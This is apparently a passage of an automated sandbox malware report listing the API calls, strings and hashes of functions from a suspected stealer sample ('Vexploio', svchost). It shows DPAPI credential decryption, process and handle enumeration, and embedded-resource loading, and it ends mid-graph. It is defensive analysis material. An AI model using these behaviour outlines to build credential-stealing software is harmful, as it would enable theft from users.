                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s
                              • API String ID: 3540041739-3551169577
                              • Opcode ID: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
                              • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                              • Opcode Fuzzy Hash: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
                              • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                • Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,761923A0), ref: 00405123
                                • Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                              • String ID:
                              • API String ID: 2987980305-0
                              • Opcode ID: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
                              • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                              • Opcode Fuzzy Hash: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
                              • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
                              APIs
                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Close$Enum
                              • String ID:
                              • API String ID: 464197530-0
                              • Opcode ID: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
                              • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                              • Opcode Fuzzy Hash: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
                              • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                              APIs
                              • CreateDirectoryA.KERNEL32(?,?,00436400), ref: 004055D0
                              • GetLastError.KERNEL32 ref: 004055E4
                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                              • GetLastError.KERNEL32 ref: 00405603
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID:
                              • API String ID: 3449924974-0
                              • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                              • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                              • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                              • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9
                              APIs
                              • DestroyWindow.USER32(?,00000000,00402EDF,00000001), ref: 00402D12
                              • GetTickCount.KERNEL32 ref: 00402D30
                              • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                              • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                              • String ID:
                              • API String ID: 2102729457-0
                              • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                              • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                              • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                              • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                              APIs
                              • IsWindowVisible.USER32(?), ref: 0040506A
                              • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                • Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                              • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                              • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                              • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                              APIs
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                              • CloseHandle.KERNEL32(?), ref: 00405675
                              Strings
                              • Error launching installer, xrefs: 00405652
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: CloseCreateHandleProcess
                              • String ID: Error launching installer
                              • API String ID: 3712363035-66219284
                              • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                              • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                              • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                              • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C
                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                              • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                              • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                              • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                              • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                              • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                              APIs
                              • memset.MSVCRT ref: 0040DDAD
                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                              • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                              • _wcsicmp.MSVCRT ref: 0040DEB2
                              • _wcsicmp.MSVCRT ref: 0040DEC5
                              • _wcsicmp.MSVCRT ref: 0040DED8
                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                              • memset.MSVCRT ref: 0040DF5F
                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                              • _wcsicmp.MSVCRT ref: 0040DFB2
                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                              • API String ID: 594330280-3398334509
                              • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                              • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 656 413ee4 649->656 657 413ee7-413efe 649->657 663 413ea2-413eae CloseHandle 651->663 654 413e61-413e68 652->654 655 413e37-413e44 GetModuleHandleW 652->655 654->651 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->651 663->642
                              APIs
                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                              • memset.MSVCRT ref: 00413D7F
                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                              • memset.MSVCRT ref: 00413E07
                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                              • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                              • API String ID: 912665193-1740548384
                              • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                              • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 755 40b58d-40b59e 756 40b5a4-40b5c0 GetModuleHandleW FindResourceW 755->756 757 40b62e-40b632 755->757 758 40b5c2-40b5ce LoadResource 756->758 759 40b5e7 756->759 758->759 760 40b5d0-40b5e5 SizeofResource LockResource 758->760 761 40b5e9-40b5eb 759->761 760->761 761->757 762 40b5ed-40b5ef 761->762 762->757 763 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 762->763 763->757
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                              • memcpy.MSVCRT ref: 0040B60D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                              • String ID: AE$BIN
                              • API String ID: 1668488027-3931574542
                              • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                              • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                              • String ID:
                              • API String ID: 767404330-0
                              • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                              • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                              APIs
                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                              • memset.MSVCRT ref: 00406F8B
                              • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$memcpymemset
                              • String ID:
                              • API String ID: 2420179184-0
                              • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                              • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                              • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                              • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                              APIs
                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FileFind$FirstNext
                              • String ID:
                              • API String ID: 1690352074-0
                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                              APIs
                              • memset.MSVCRT ref: 0041898C
                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: InfoSystemmemset
                              • String ID:
                              • API String ID: 3558857096-0
                              • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                              • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 